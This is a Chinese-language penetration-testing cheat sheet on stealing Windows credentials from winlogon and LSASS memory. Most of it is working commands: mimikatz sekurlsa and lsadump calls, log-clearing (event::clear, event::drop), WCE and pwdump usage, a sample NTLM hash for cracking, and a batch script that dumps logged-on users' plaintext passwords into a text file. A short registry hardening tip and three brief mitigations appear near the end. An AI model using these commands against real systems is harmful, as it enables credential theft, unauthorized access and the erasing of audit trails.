3 winlogon.exe 中的用户信息

• 获取winlogon.exe进程中用户的账户与密码信息，对于Windows 2000/XP可以用FindPass，对于Windows XP以及Windows Server 2003可以用WinlogonHack，而对于Windows XP、Windows Server 2003、Windows Server 2008、Windows Vista、Windows 7以及 Windows 7 SP1都可以用mimikatz。

• 演示环境：任意一种操作系统主机，此处以64位Windows 7操作系统主机为例。 演示工具：mimikatz 2.1。
  操作概要： ①运行软件； ②输入命令，提升权限，获取密码。

• windows下缓存密码：

1.浏览器Cookie密码，一般在设置->高级->隐私那里可以明文查看密码

2.windows网络程序密码，比如邮箱，MSN等
控制面板\所有控制面板项\凭据管理器

3.wifi密码
需要在图形界面才能看到，下面有一款工具可以命令行界面下显示wifi密码

4.图形化密码获取工具
http://www.nirsoft.net/password_recovery_tools.html
里面有很多密码缓存读取工具:
ChatTools OutLookMail IE Wireless WebBrowser Chrome RemoteDesktop

5.pwdDump 在kali下有（读取SAM文件）
usr/share/windows-binaries/fgdump
如果系统没有加入域，仅在工作组:
pwdDump.exe localhost 可获取密码hash值

6.hash 破解 复制hash值：
king:1003:8C6F5D02DEB21501AAD3B435B51404EE:E0FBA38268D0EC66EF1CB452D5885E53:::
到Kali 系统 ，使用Ophcrack工具对其破解即可，默认只破解简单的纯字母和纯数字，需要下载字典tables 才能破解复杂的密码

7.WCE 破解windows密码 ，在kali下有：（读取内存值）
该方法可以获取当前还未注销的用户密码，切换用户可以同时让多个用户会话并存于内存中
/usr/share/wce/
wce-universal.exe -l 列出hash值
wce-universal.exe -lv 列出详细信息
wce-universal.exe -d 0008E1E0 指定LUID会话删除
wce-universal.exe -r 周期性列出登录会话
wce-universal.exe -g 123456 生成123456的LM/NT 哈希
wce-universal.exe -w 明文显示hash密码
wce-universal.exe -i 0008E1E0 -s 000DB0B2:demon:PX-B350356F8BD4:E0C510199CC66ABDAAD3B435B51404EE:352DFE551D62459B20349B78A21A2F37
修改指定的登录会话为其他会话信息

如何防止别人通过wce 查看明文密码？
默认windows启动了安全包 NTLM Security Package 会在内存维护明文密码
可以通过注册表的修改，禁止Digest Authentication Package显示明文在内存中
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\下的 Security Packages（右边）其值为：
kerberos
msv1_0
schannel
wdigest 本地登录的明文密码维护
tspkg 远程登录的明文密码维护
pku2u

想要防止需要把 wdigest 和 tspkg 两个值删除
记得要删彻底不能留换行符，否则注册表爆错
重启后发现无法读取明文密码了
另外注意： 如果注册表里删除了wdigest的值，继续使用wce -w 注入dll
的话会导致注入失败，从而导致系统损坏LSA shell报错
不过重启后仍然可以正常使用系统

[windows运行命令] eventvwr

8 Windows渗透神器： Mimikatz.exe
kali路径： /usr/share/mimikatz/

privilege::debug 提权为system debug权限
sekurlsa::logonPasswords 列出当前登录的用户明文密码，包含wdigest kerberos
sekurlsa::kerberos 读取域下的用户会话明文密码
sekurlsa::wdigest 读取本地用户会话的明文密码
process::list 列出当前系统的所以进程
process::start cmd.exe 启动进程
process::stop /pid:2844 关闭进程
process::suspend /pid:2768 暂停进程
process::resume /pid:2768 恢复进程
service::list 列出服务
lsadump::sam 获取sam文件的hash值
lsadump::cache 获取缓存内容
ts::session 查看现有的登录会话
ts::multirdp 远程桌面单用户多会话补丁
event::clear 清除安全日志
event::drop 后面的操作不再产生新的日志
minesweeper::infos 扫雷透视
misc::cmd 打开cmd
misc::regedit 打开注册表
misc::taskmgr 任务管理器
misc::wifi 查看所有以保存的wifi密码
token::list 列出windows票据
token::whoami 列出当前会话票据
kerberos::list 查看所有票据
kerberos::purge 清除票据
kerberos::ptc TGT_user@xxx.com 导入票据

• 改进mimikatz工具，使其不必在DOS界面中输入命令，而是用bat启动的方法获取系统的用户名和密码信息，并写入记事本文件中。

mimikatz 是DOS界面，所以可以用bat启动，具体操作如下：
① 打开记事本，在其中输入如下代码：
@Echo Off
title
color 3B
mode con: cols=37 lines=13
cd %~dp0
mimikatz64.exe "privilege::debug" "sekurlsa::logonpasswords">>password.txt
pause
exit

② 将该文件保存至mimikatz64.exe所在的文件夹，并命名为start.bat；
③ 右键点击，以管理员身份运行start.bat文件；
④ 在文件夹下查看password.txt文件，里面便有获取的系统账户和密码信息。

mimikatz的功能相对比较强大，对现行的Windows系统基本通杀，而 且目前微软没有相应的补丁来解决这个漏洞。因此，针对该类软件的 防范措施主要有三个方面： ① 硬件安全。保证计算机硬件不被可疑人员接触，这是保证系统安 全的首要条件。 ② 设置屏幕保护密码。设置屏幕保护密码，使得用户离开计算机时， 能及时将屏幕锁定。 ③ 变更用户时重启计算机。